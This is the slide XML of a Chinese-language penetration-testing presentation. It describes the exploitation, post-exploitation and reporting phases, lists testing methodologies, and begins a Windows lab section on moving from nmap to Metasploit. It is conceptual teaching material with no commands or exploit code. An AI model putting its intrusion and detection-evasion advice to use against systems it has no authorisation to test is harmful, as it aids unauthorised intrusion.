            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{673179C1-9F96-4939-80DE-35AC937F7F6F}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1898450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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透攻擊階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透攻擊（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>）是滲透測試過程中最具有魅力的環節。在此環節中，滲透測試團隊需要利用他們所找出的目標系統安全漏洞，來真正入侵系統當中，獲得訪問控制權。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透攻擊可以利用公開渠道可獲取的滲透程式碼，但一般在實際應用場景中，滲透測試者還需要充分地考慮目標系統特性來定製滲透攻擊，並需要挫敗目標網路與系統中實施的安全防禦措施，才能成功達成滲透目的。在黑盒測試中，滲透測試者還需要考慮對目標系統檢測機制的逃逸，從而避免造成目標組織安全響應團隊的警覺和發現。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2339363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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>後滲透攻擊階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>後滲透攻擊（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PostExploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>）是整個滲透測試過程中最能夠體現滲透測試團隊創造力與技術能力的環節。在這個環節中，需要滲透測試團隊根據目標組織的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>業務經營模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>保護資產形式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>安全防禦計劃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>的不同特點，自主設計出攻擊目標，識別關鍵基礎設施，並尋找客戶組織最具價值和嘗試安全保護的資訊和資產，最終達成能夠對客戶組織造成最重要業務影響的攻擊途徑。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2776869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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>撰寫報告階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試過程最終向客戶組織提交，取得認可併成功獲得合同付款的就是一份滲透測試報告（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Reporting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>）。這份報告凝聚了之前所有階段之中滲透測試團隊所獲取的關鍵情報資訊、探測和發掘出的系統安全漏洞、成功滲透攻擊的過程，以及造成業務影響後果的攻擊途徑，同時還要站在防禦者的角度上，幫助他們分析安全防禦體系中的薄弱環節、存在的問題，以及修補與升級技術方案。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2995860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923925" y="2174875"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試方法論</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2039395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ED0A6F-5AFC-48CC-BC10-05E032F1BCE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試方法論</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{428B3968-A389-4C44-82F1-02727E30B29E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="11616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1875893" y="1690688"/>
            <a:ext cx="8440213" cy="4030258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F9B2664-9734-4AF1-ABFE-E90A5B6F466C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2434363" y="6001555"/>
            <a:ext cx="7534141" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://wiki.owasp.org/index.php/Penetration_testing_methodologies</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194165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25F3F7-5A53-47D1-9BAE-E3BD75A36632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試方法論</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646FA893-633F-4C6B-AF4E-022D7889FF05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>滲透測試執行標準（PTES） www.pentest-standard.org </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>PCI滲透測試指南 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>PCI DSS滲透測試指南 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>PCI DSS滲透測試要求 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>滲透測試框架 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>信息安全測試和評估技術指南（NIST800-115） </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>信息系統安全評估框架（ISSAF） </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>開源安全測試方法手冊（OSSTMM） </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW"/>
              <a:t>攻擊性（Web）測試框架《 OWTF》 2012 https://github.com/7a/owtf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文字方塊 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E89F0FB-FCDF-4B20-8A68-C9B2085F1051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2009106" y="6176963"/>
            <a:ext cx="7006105" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400"/>
              <a:t>參考資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:t>20210106_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400"/>
              <a:t>期末報告範本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:t>_Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400"/>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:t>Page 9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:t>20201230https://wiki.owasp.org/index.php/Penetration_testing_methodologies</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2287329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923925" y="2174875"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">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262091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內容版面配置區 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B61C269-EC48-4251-BD42-5317D7BA0374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="45501" b="60051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144849" y="2403287"/>
            <a:ext cx="7705828" cy="3103724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="標題 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A10564-74A6-4135-89F5-64C8C279A804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>檢查自己跟靶機的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="內容版面配置區 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C52A2C-7ED2-4B58-B921-FBF6604FF88F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252883" y="1954414"/>
            <a:ext cx="5794268" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01404E4C-2C04-4097-9613-A7ECF9D506A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205027" y="1770229"/>
            <a:ext cx="4262907" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>在實作前起碼要知道目標跟自己的位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
